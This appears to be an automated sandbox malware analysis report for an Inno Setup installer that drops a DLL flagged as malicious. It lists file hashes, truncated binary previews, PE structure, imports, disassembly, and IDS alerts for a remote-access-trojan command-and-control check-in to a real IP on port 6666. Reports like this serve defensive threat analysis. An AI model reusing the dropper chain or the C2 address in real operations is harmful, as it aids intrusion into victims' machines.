Joe Sandbox View:	Filename: 017069451a4dbc523a1165a2f1bd361a762bb40856778.exe, Detection: malicious, Browse
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L...V..O..........................................@..........................p...................@...............................7..................................................................................X...x............................text...<........................... ..`.itext.............................. ..`.data..../.......0..................@....bss....pa...............................idata...7.......8..................@....tls....<............ ...................rdata............... ..............@..@.rsrc................"..............@..@....................................@..@........................................................................................................................................

C:\Users\user\AppData\Local\Temp\is-6HP8A.tmp\RXxeYma4d5.tmp

Download File

Process:	C:\Users\user\Desktop\RXxeYma4d5.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1223168
Entropy (8bit):	6.330739929540704
Encrypted:	false
SSDEEP:	24576:tYwCLCUplZhgjXj8YcgoniqO3CBiO0jaS+EtjC67V5QNx9Ie:MGUhni7iSFCQij
MD5:	D5A634439F2ABA0A8D26F31577C73343
SHA1:	7B86B632DDFC82EBC58861A3968B3D2138CD9D53
SHA-256:	B61A425A51DB33911BDC3B8CD89DD2FB47B9E6CDFABCBCAE29391B3568EED198
SHA-512:	A3A426FB963436E9C467506FEC6EF9C3919A9AB1CA15F92759B37672D0F3BDCC026B2A44A7AF684EA46455EE3216307E5818C282F7BDBCAD6C45DF24B1EE5AC7
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 4%
Joe Sandbox View:	Filename: 017069451a4dbc523a1165a2f1bd361a762bb40856778.exe, Detection: malicious, Browse
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L...V..O..........................................@..........................p...................@...............................7..................................................................................X...x............................text...<........................... ..`.itext.............................. ..`.data..../.......0..................@....bss....pa...............................idata...7.......8..................@....tls....<............ ...................rdata............... ..............@..@.rsrc................"..............@..@....................................@..@........................................................................................................................................

C:\Users\user\AppData\Local\Temp\is-I3JO9.tmp\_isetup\_setup64.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-25UIU.tmp\RXxeYma4d5.tmp
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	6144
Entropy (8bit):	4.215994423157539
Encrypted:	false
SSDEEP:	96:sfkcXegaJ/ZAYNzcld1xaX12pS5SKvkc:sfJEVYlvxaX12EF
MD5:	4FF75F505FDDCC6A9AE62216446205D9
SHA1:	EFE32D504CE72F32E92DCF01AA2752B04D81A342
SHA-256:	A4C86FC4836AC728D7BD96E7915090FD59521A9E74F1D06EF8E5A47C8695FD81
SHA-512:	BA0469851438212D19906D6DA8C4AE95FF1C0711A095D9F21F13530A6B8B21C3ACBB0FF55EDB8A35B41C1A9A342F5D3421C00BA395BC13BB1EF5902B979CE824
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: 017069451a4dbc523a1165a2f1bd361a762bb40856778.exe, Detection: malicious, Browse Filename: vc8Kx5C54G.exe, Detection: malicious, Browse Filename: AbC0LBkVhr.exe, Detection: malicious, Browse Filename: Mg5bMQ2lWi.exe, Detection: malicious, Browse Filename: KRdh0OaXqH.exe, Detection: malicious, Browse Filename: wG1fFAzGfH.exe, Detection: malicious, Browse Filename: AGcC2uK0El.exe, Detection: malicious, Browse Filename: 6hvZpn91O8.exe, Detection: malicious, Browse Filename: j9htknb7BQ.exe, Detection: malicious, Browse Filename: AMS_Client_SSO.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d...XW:J..........#............................@.............................`..............................................................<!.......P..@....@..0.................................................................... ...............................text............................... ..`.rdata..\|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...@....P......................@..@................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\is-I3JO9.tmp\_isetup\_shfoldr.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-25UIU.tmp\RXxeYma4d5.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	23312
Entropy (8bit):	4.596242908851566
Encrypted:	false
SSDEEP:	384:+Vm08QoKkiWZ76UJuP71W55iWHHoSHigH2euwsHTGHVb+VHHmnH+aHjHqLHxmoq1:2m08QotiCjJuPGw4
MD5:	92DC6EF532FBB4A5C3201469A5B5EB63
SHA1:	3E89FF837147C16B4E41C30D6C796374E0B8E62C
SHA-256:	9884E9D1B4F8A873CCBD81F8AD0AE257776D2348D027D811A56475E028360D87
SHA-512:	9908E573921D5DBC3454A1C0A6C969AB8A81CC2E8B5385391D46B1A738FB06A76AA3282E0E58D0D2FFA6F27C85668CD5178E1500B8A39B1BBAE04366AE6A86D3
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......IzJ^..$...$...$...%.".$.T87...$.[."...$...$...$.Rich..$.........................PE..L.....\;...........#..... ...4.......'.......0.....q....................................................................k...l)..<....@.../...................p..T....................................................................................text...{........ .................. ..`.data...\....0.......&..............@....rsrc..../...@...0...(..............@..@.reloc.......p.......X..............@..B................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\is-I54BB.tmp\_isetup\_setup64.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-6HP8A.tmp\RXxeYma4d5.tmp
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	6144
Entropy (8bit):	4.215994423157539
Encrypted:	false
SSDEEP:	96:sfkcXegaJ/ZAYNzcld1xaX12pS5SKvkc:sfJEVYlvxaX12EF
MD5:	4FF75F505FDDCC6A9AE62216446205D9
SHA1:	EFE32D504CE72F32E92DCF01AA2752B04D81A342
SHA-256:	A4C86FC4836AC728D7BD96E7915090FD59521A9E74F1D06EF8E5A47C8695FD81
SHA-512:	BA0469851438212D19906D6DA8C4AE95FF1C0711A095D9F21F13530A6B8B21C3ACBB0FF55EDB8A35B41C1A9A342F5D3421C00BA395BC13BB1EF5902B979CE824
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d...XW:J..........#............................@.............................`..............................................................<!.......P..@....@..0.................................................................... ...............................text............................... ..`.rdata..\|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...@....P......................@..@................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\is-I54BB.tmp\_isetup\_shfoldr.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-6HP8A.tmp\RXxeYma4d5.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	23312
Entropy (8bit):	4.596242908851566
Encrypted:	false
SSDEEP:	384:+Vm08QoKkiWZ76UJuP71W55iWHHoSHigH2euwsHTGHVb+VHHmnH+aHjHqLHxmoq1:2m08QotiCjJuPGw4
MD5:	92DC6EF532FBB4A5C3201469A5B5EB63
SHA1:	3E89FF837147C16B4E41C30D6C796374E0B8E62C
SHA-256:	9884E9D1B4F8A873CCBD81F8AD0AE257776D2348D027D811A56475E028360D87
SHA-512:	9908E573921D5DBC3454A1C0A6C969AB8A81CC2E8B5385391D46B1A738FB06A76AA3282E0E58D0D2FFA6F27C85668CD5178E1500B8A39B1BBAE04366AE6A86D3
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......IzJ^..$...$...$...%.".$.T87...$.[."...$...$...$.Rich..$.........................PE..L.....\;...........#..... ...4.......'.......0.....q....................................................................k...l)..<....@.../...................p..T....................................................................................text...{........ .................. ..`.data...\....0.......&..............@....rsrc..../...@...0...(..............@..@.reloc.......p.......X..............@..B................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\second_data_temp.zip

Download File

Process:	C:\Windows\System32\regsvr32.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=deflate
Category:	dropped
Size (bytes):	124944
Entropy (8bit):	7.946193612196617
Encrypted:	false
SSDEEP:	3072:yEbzO3t9QEhtvaiS8wJEKh2fnscdzZNZyLLF6C3oR:ytLzHvdAwsmVHyt2
MD5:	4A7761E79B0B3315FCFB8453DEA4E478
SHA1:	401F63318F270068161CB4987A8659688346BA8F
SHA-256:	644155574CEA880C34CE3AB19BD3FD8A30E9F6C97469D0F1FB99288620FCB654
SHA-512:	81331E9B4F6EF02B1DF309B8A6836BD6B9BE3EF173B60407B521CFDD0C9F38DB0699BACDD4042899D62C1A0E5A20C07EFFCAD1CF614E1F0A763894B20143EC01
Malicious:	false
Preview:	PK.........L.Yb.:el..........second_data.bin.[y8.....c+..S..f.%...X..d.d..Ub2...4.D.1..dK.%BJ"..."K.=......s....{.~.s...}?..]...-.......<....p,.nA.)..XZf [..8...f.......+...(4...Hu..=c..{+K.R...0...M.\|(.f.\|.}E.[M {.i..~}n../.~.[..d1A...b..B.a..n.............#.B....<.......^c...h....M....VR..O7...,..X.~R..;..)..x....h=...[K...Vr....C..d=IY!y.VS'^0.....`.88._0zV...J.e.Nj.{.q...N%u9.7...J.D)...4.?m....sL.....VP....d..c..$a/.5...!,5.p...!9.m...g^.S..Y......,..~.>N..A...{~4O..G....=z..@2Gwk......g....0.*Z..$q..6....<.#0.'.C..D.f........(.Ys...a.7.[.d.........._.v...6.....o..9.t...-'5.....\....\...T.0..4).a?.r4%....Ul.M..)0D..G...y..y3.AJ/....&.hW. q........B.>J.o...>BTY.L..\f...+.R.=c.j.:;e....%6l...Y..f...}._.......?....../...?'g.7.._......{.k...r...=......_.......r.VZa...X ..r3.........c..".......f.]:...#3V..n...b.J.T...n..u..Ke.I...#Q.a..........r.}k.o.k...g....t{.M.....=....8...G.....p.Pz#Y^.&N._8...~..&...w.+..N.......'...:.&1..u.>.u?.".~.,...

C:\Users\user\AppData\Local\is-HU557.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-6HP8A.tmp\RXxeYma4d5.tmp
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1245543
Entropy (8bit):	6.304831359808555
Encrypted:	false
SSDEEP:	24576:FYwCLCUplZhgjXj8YcgoniqO3CBiO0jaS+EtjC67V5QNx9I4:UGUhni7iSFCQiX
MD5:	BC171227D80BB934474A5D046DE439A8
SHA1:	2728D7E7FB8041B15EE13297FDC3BE4D3C66BBD4
SHA-256:	0D61901F6DEBBDCBBAFBC6B3448D6304D86415861F3635F459441F4AA95B9DCB
SHA-512:	3C7B2308F14BB74FA275383CB721D34BDBBBCF41D58849A13898C57246A0E2E4F6146E366D6AEB38A9BB5043B2C1BA231F06BD575C42E389B92F49C85FF373DF
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 4%
Preview:	MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L...V..O..........................................@..........................p...................@...............................7..................................................................................X...x............................text...<........................... ..`.itext.............................. ..`.data..../.......0..................@....bss....pa...............................idata...7.......8..................@....tls....<............ ...................rdata............... ..............@..@.rsrc................"..............@..@....................................@..@........................................................................................................................................

C:\Users\user\AppData\Local\unins000.dat

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-6HP8A.tmp\RXxeYma4d5.tmp
File Type:	InnoSetup Log File Manager, version 0x418, 3441 bytes, 965969\37\user\376, C:\Users\user\AppData\Local\376\377\377\0
Category:	dropped
Size (bytes):	3441
Entropy (8bit):	3.766643339701647
Encrypted:	false
SSDEEP:	96:Y8g1dblhcpvwvJu82tiKSC6bufc1AGlEDA4MZAe2Lb0Hhcv:01dphcpvcJu1iaf7fDSmb0HC
MD5:	1DF4001A16676A5CECABCE42E8991EA6
SHA1:	A6C50DE5924E4291DB9A0D222203AD897CBB6DF1
SHA-256:	963CE95AA41B0AD6CBEC4B1FAAD8A9A96394F56DD3AAEB7B9966983E94BC5CB4
SHA-512:	F524BD1BA4F2D27E8FF19D7552C6567DCC95B30F4C22E1D64B929918787AD8C0629877D5908419C9120E6EC120865A32483ECD0F72E0AB48AAC43B87EC86E8FC
Malicious:	false
Preview:	Inno Setup Uninstall Log (b)....................................File Manager....................................................................................................................File Manager............................................................................................................................q...%...............................................................................................................~..N....Z....di......s........9.6.5.9.6.9......j.o.n.e.s......C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l..................7.;.. ..............IFPS...............................................................................................................................................................BOOLEAN..............TWIZARDFORM....TWIZARDFORM.................!MAIN....-1..(...dll:shell32.dll.ShellExecuteW........................HASCMDLINEPARAM....26 @16..PARAMCOUNT.......COMPARETEXT.........PARAMSTR...........E.......INITIALIZESE

C:\Users\user\AppData\Local\unins000.exe (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-6HP8A.tmp\RXxeYma4d5.tmp
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1245543
Entropy (8bit):	6.304831359808555
Encrypted:	false
SSDEEP:	24576:FYwCLCUplZhgjXj8YcgoniqO3CBiO0jaS+EtjC67V5QNx9I4:UGUhni7iSFCQiX
MD5:	BC171227D80BB934474A5D046DE439A8
SHA1:	2728D7E7FB8041B15EE13297FDC3BE4D3C66BBD4
SHA-256:	0D61901F6DEBBDCBBAFBC6B3448D6304D86415861F3635F459441F4AA95B9DCB
SHA-512:	3C7B2308F14BB74FA275383CB721D34BDBBBCF41D58849A13898C57246A0E2E4F6146E366D6AEB38A9BB5043B2C1BA231F06BD575C42E389B92F49C85FF373DF
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 4%
Preview:	MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L...V..O..........................................@..........................p...................@...............................7..................................................................................X...x............................text...<........................... ..`.itext.............................. ..`.data..../.......0..................@....bss....pa...............................idata...7.......8..................@....tls....<............ ...................rdata............... ..............@..@.rsrc................"..............@..@....................................@..@........................................................................................................................................

C:\Users\user\AppData\Roaming\Setup_Cow.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-6HP8A.tmp\RXxeYma4d5.tmp
File Type:	PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	801217
Entropy (8bit):	6.835421715076469
Encrypted:	false
SSDEEP:	12288:+3J5++rjKV5hL3H84utTaasFYczPdAwsOStzwe5u+:+5jHKV513H8vtTgFDzPdAwVo0e5u+
MD5:	67CA0A61413616CA31ED61867F344FA8
SHA1:	2D3E4D0A0DA8FE31D02ADCAD58DDEEB408B1C02E
SHA-256:	D69E2296C8211872641FB4FD022CCEABD5521110D5FE47A66993FB9A19B526AA
SHA-512:	30EC9418A7182E70CC0E2504CFFDB02DF5152A36D3007DAFD9AC2379BA69316B1718C1A7F7EEE1948257211A3EE09511A65CB0AEA269C247C9169569BACC0036
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 61%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......C.>........&"...*.....:......0...............................................^M....`... ......................................`.......p..................4 ..............................................(....................t...............................text...............................`..`.data... .... ......................@....rdata.......0......................@..@.pdata..4 ......."..................@..@.xdata...G.......H..................@..@.bss....`....P...........................edata.......`......................@..@.idata.......p......................@....CRT....`............4..............@....tls.................6..............@....reloc...............8..............@..B........................................................................................................................................................................

C:\Users\user\AppData\Roaming\is-I9R0P.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-6HP8A.tmp\RXxeYma4d5.tmp
File Type:	PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	801217
Entropy (8bit):	6.835421715076469
Encrypted:	false
SSDEEP:	12288:+3J5++rjKV5hL3H84utTaasFYczPdAwsOStzwe5u+:+5jHKV513H8vtTgFDzPdAwVo0e5u+
MD5:	67CA0A61413616CA31ED61867F344FA8
SHA1:	2D3E4D0A0DA8FE31D02ADCAD58DDEEB408B1C02E
SHA-256:	D69E2296C8211872641FB4FD022CCEABD5521110D5FE47A66993FB9A19B526AA
SHA-512:	30EC9418A7182E70CC0E2504CFFDB02DF5152A36D3007DAFD9AC2379BA69316B1718C1A7F7EEE1948257211A3EE09511A65CB0AEA269C247C9169569BACC0036
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 61%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......C.>........&"...*.....:......0...............................................^M....`... ......................................`.......p..................4 ..............................................(....................t...............................text...............................`..`.data... .... ......................@....rdata.......0......................@..@.pdata..4 ......."..................@..@.xdata...G.......H..................@..@.bss....`....P...........................edata.......`......................@..@.idata.......p......................@....CRT....`............4..............@....tls.................6..............@....reloc...............8..............@..B........................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.745766845427773
TrID:	Win32 Executable (generic) a (10002005/4) 98.86% Inno Setup installer (109748/4) 1.08% Win16/32 Executable Delphi generic (2074/23) 0.02% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02%
File name:	RXxeYma4d5.exe
File size:	956'899 bytes
MD5:	6496951be7839af7461c7988dd4d324f
SHA1:	b0da6dacfdfafa38f4da8a6de97777a839ab36e4
SHA256:	32a8c77f35f4bd8fdd4afe2e5d37c9effeac2df4ba141a3ac611fee37447f68f
SHA512:	12d307bd033def7cda32376c0706ae7a300a8e439de18e3ef1a841ce95e3085398d0f617a7bfada7f0392120f02ad01362c0ec36c4191fee5ef85ca8f98d2bee
SSDEEP:	24576:JMjhoLtj63OtMIHV07oWsRvtciqgQRgOD39IUZd:AKj0OPHV071SciuRgC9IUZd
TLSH:	26150202BB8374FCED14CA74C871B4446DDE3DA497E711392DB8FA4D0B7A28A48B7961
File Content Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

File Icon


Icon Hash:	4ec1caccccca400d

Static PE Info

General

Entrypoint:	0x416478
Entrypoint Section:	.itext
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
DLL Characteristics:	TERMINAL_SERVER_AWARE
Time Stamp:	0x3DE6EFBD [Fri Nov 29 04:40:29 2002 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	483f0c4259a9148c34961abbda6146c1

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
add esp, FFFFFFA4h
push ebx
push esi
push edi
xor eax, eax
mov dword ptr [ebp-3Ch], eax
mov dword ptr [ebp-40h], eax
mov dword ptr [ebp-5Ch], eax
mov dword ptr [ebp-30h], eax
mov dword ptr [ebp-38h], eax
mov dword ptr [ebp-34h], eax
mov dword ptr [ebp-2Ch], eax
mov dword ptr [ebp-28h], eax
mov dword ptr [ebp-14h], eax
mov eax, 004152B8h
call 00007F064C824041h
xor eax, eax
push ebp
push 00416B45h
push dword ptr fs:[eax]
mov dword ptr fs:[eax], esp
xor edx, edx
push ebp
push 00416B01h
push dword ptr fs:[edx]
mov dword ptr fs:[edx], esp
mov eax, dword ptr [0041AB48h]
call 00007F064C8328EBh
call 00007F064C832492h
lea edx, dword ptr [ebp-14h]
xor eax, eax
call 00007F064C82C114h
mov edx, dword ptr [ebp-14h]
mov eax, 0041D6E8h
call 00007F064C822677h
push 00000002h
push 00000000h
push 00000001h
mov ecx, dword ptr [0041D6E8h]
mov dl, 01h
mov eax, dword ptr [0040F080h]
call 00007F064C82C9FFh
mov dword ptr [0041D6ECh], eax
xor edx, edx
push ebp
push 00416AADh
push dword ptr fs:[edx]
mov dword ptr fs:[edx], esp
call 00007F064C832973h
mov dword ptr [0041D6F4h], eax
mov eax, dword ptr [0041D6F4h]
cmp dword ptr [eax+0Ch], 01h
jne 00007F064C833CDAh
mov eax, dword ptr [0041D6F4h]
mov edx, 00000028h
call 00007F064C82CEC8h
mov edx, dword ptr [0041D6F4h]

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x1e000	0xf9e	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x21000	0x1a724	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x20000	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x1e350	0x24c	.idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x143f8	0x14400	c9bb3afc1ceaaa31127ccfa204c657ef	False	0.5487316743827161	data	6.482216817915366	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.itext	0x16000	0xbe8	0xc00	1ba5adf2e1058c0460dcc814ba86fb32	False	0.6246744791666666	data	6.005798728198158	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data	0x17000	0xd9c	0xe00	d5b22eff9e08edaa95f493c1a71158c0	False	0.2924107142857143	data	2.669288666959085	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.bss	0x18000	0x574c	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x1e000	0xf9e	0x1000	b47eaca4c149ee829de76a342b5560d5	False	0.35595703125	data	4.9677831942996935	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls	0x1f000	0x8	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata	0x20000	0x18	0x200	3746f5876803f8f30db5bb2deb8772ae	False	0.05078125	data	0.190488766434666	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0x21000	0x1a724	0x1a800	421d70a18258de633df2ded74d6c9fe1	False	0.12851009728773585	data	4.230549890480233	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x2138c	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 65536, resolution 2835 x 2835 px/m	English	United States	0.1033065183958358
RT_STRING	0x31bb4	0xc4	data			0.5969387755102041
RT_STRING	0x31c78	0xcc	data			0.6225490196078431
RT_STRING	0x31d44	0x174	data			0.5510752688172043
RT_STRING	0x31eb8	0x39c	data			0.34523809523809523
RT_STRING	0x32254	0x34c	data			0.4218009478672986
RT_STRING	0x325a0	0x294	data			0.4106060606060606
RT_RCDATA	0x32834	0x82e8	data	English	United States	0.11261637622344235
RT_RCDATA	0x3ab1c	0x10	data			1.5
RT_RCDATA	0x3ab2c	0x1a0	data			0.8149038461538461
RT_RCDATA	0x3accc	0x2c	data			1.1818181818181819
RT_GROUP_ICON	0x3acf8	0x14	data	English	United States	1.15
RT_VERSION	0x3ad0c	0x4b8	COM executable for DOS	English	United States	0.3079470198675497
RT_MANIFEST	0x3b1c4	0x560	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.4251453488372093

Imports

DLL	Import
oleaut32.dll	SysFreeString, SysReAllocStringLen, SysAllocStringLen
advapi32.dll	RegQueryValueExW, RegOpenKeyExW, RegCloseKey
user32.dll	GetKeyboardType, LoadStringW, MessageBoxA, CharNextW
kernel32.dll	GetACP, Sleep, VirtualFree, VirtualAlloc, GetSystemInfo, GetTickCount, QueryPerformanceCounter, GetVersion, GetCurrentThreadId, VirtualQuery, WideCharToMultiByte, MultiByteToWideChar, lstrlenW, lstrcpynW, LoadLibraryExW, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleW, GetModuleFileNameW, GetLocaleInfoW, GetCommandLineW, FreeLibrary, FindFirstFileW, FindClose, ExitProcess, WriteFile, UnhandledExceptionFilter, RtlUnwind, RaiseException, GetStdHandle, CloseHandle
kernel32.dll	TlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleW
user32.dll	CreateWindowExW, TranslateMessage, SetWindowLongW, PeekMessageW, MsgWaitForMultipleObjects, MessageBoxW, LoadStringW, GetSystemMetrics, ExitWindowsEx, DispatchMessageW, DestroyWindow, CharUpperBuffW, CallWindowProcW
kernel32.dll	WriteFile, WideCharToMultiByte, WaitForSingleObject, VirtualQuery, VirtualProtect, VirtualFree, VirtualAlloc, SizeofResource, SignalObjectAndWait, SetLastError, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ResetEvent, RemoveDirectoryW, ReadFile, MultiByteToWideChar, LockResource, LoadResource, LoadLibraryW, LeaveCriticalSection, InitializeCriticalSection, GetWindowsDirectoryW, GetVersionExW, GetUserDefaultLangID, GetThreadLocale, GetSystemInfo, GetStdHandle, GetProcAddress, GetModuleHandleW, GetModuleFileNameW, GetLocaleInfoW, GetLocalTime, GetLastError, GetFullPathNameW, GetFileSize, GetFileAttributesW, GetExitCodeProcess, GetEnvironmentVariableW, GetDiskFreeSpaceW, GetDateFormatW, GetCurrentProcess, GetCommandLineW, GetCPInfo, InterlockedExchange, InterlockedCompareExchange, FreeLibrary, FormatMessageW, FindResourceW, EnumCalendarInfoW, EnterCriticalSection, DeleteFileW, DeleteCriticalSection, CreateProcessW, CreateFileW, CreateEventW, CreateDirectoryW, CompareStringW, CloseHandle
advapi32.dll	RegQueryValueExW, RegOpenKeyExW, RegCloseKey, OpenProcessToken, LookupPrivilegeValueW
comctl32.dll	InitCommonControls
kernel32.dll	Sleep
advapi32.dll	AdjustTokenPrivileges
oleaut32.dll	SafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopy, VariantClear, VariantInit

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-30T23:12:22.238374+0100	2052875	ET MALWARE Anonymous RAT CnC Checkin	1	192.168.2.4	49736	23.235.165.54	6666	TCP
2024-12-30T23:13:30.811748+0100	2052875	ET MALWARE Anonymous RAT CnC Checkin	1	192.168.2.4	49737	23.235.165.54	6666	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 30, 2024 23:12:22.232784033 CET	49736	6666	192.168.2.4	23.235.165.54
Dec 30, 2024 23:12:22.237732887 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:22.237833977 CET	49736	6666	192.168.2.4	23.235.165.54
Dec 30, 2024 23:12:22.238373995 CET	49736	6666	192.168.2.4	23.235.165.54
Dec 30, 2024 23:12:22.243113041 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:23.099669933 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:23.099968910 CET	49736	6666	192.168.2.4	23.235.165.54
Dec 30, 2024 23:12:23.104865074 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:23.104876041 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:23.104886055 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:23.406429052 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:23.406443119 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:23.406455040 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:23.406493902 CET	49736	6666	192.168.2.4	23.235.165.54
Dec 30, 2024 23:12:23.406716108 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:23.406727076 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:23.406773090 CET	49736	6666	192.168.2.4	23.235.165.54
Dec 30, 2024 23:12:23.617100954 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:23.617114067 CET	6666	49736	23.235.165.54	192.168.2.4
Dec 30, 2024 23:12:23.617125988 CET	6666	49736	23.235.165.54	192.168.2.4
